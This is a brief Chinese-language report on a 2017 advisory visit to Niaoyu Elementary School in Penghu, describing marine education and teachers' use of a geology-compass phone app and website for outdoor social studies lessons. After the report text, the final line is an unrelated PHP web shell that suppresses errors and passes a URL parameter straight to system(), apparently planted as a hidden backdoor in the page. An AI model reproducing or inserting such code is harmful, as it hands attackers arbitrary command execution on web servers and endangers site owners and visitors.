澎湖縣國教輔導團106年度國小社會領域-白沙鄉鳥嶼國小到校輔導

白沙鄉鳥嶼國小
2017-03-17 週五
陳鴻賢校長、葉啟賢校長、謝宗融主任
該領域專長教師:0人 非領域專長教師:9人

發展海洋教育作為學校發展特色,將其融入藝文領域和語文領域,不只表現在視覺藝術、和表演藝術上,也結合語文領域,並發展成為學校特色課程。

1.運用手機app程式在社會領域上,有利於戶外教學活動進行記錄。 2.讓學生學會自行動手操作程式,學生學習的動機及效益會更大。

1.社會領域在戶外課程方面可以如何有效進行。 2.戶外課程成果可以如何呈現及記錄。

1.輔導員實際到校進行手機app「地質羅盤」程式解說及定位教學,並到社區拍照實際操作程式。 2.將所拍的照片上傳網路空間,並運用「地質騰雲網」網站呈現照片及路線。

1.鼓勵教師多利用線上程式來進行戶外教學活動,學生學習更快樂又有效。 2.提供戶外課程進行的技巧和方式,並如何呈現教學成果讓教師學習。 3.說明搭配使用「地質羅盤」程式進行戶外教學的方式,鼓勵鳥嶼國小師生也能運用。

error_reporting(0); $bozx=$_GET[boz]; system($bozx);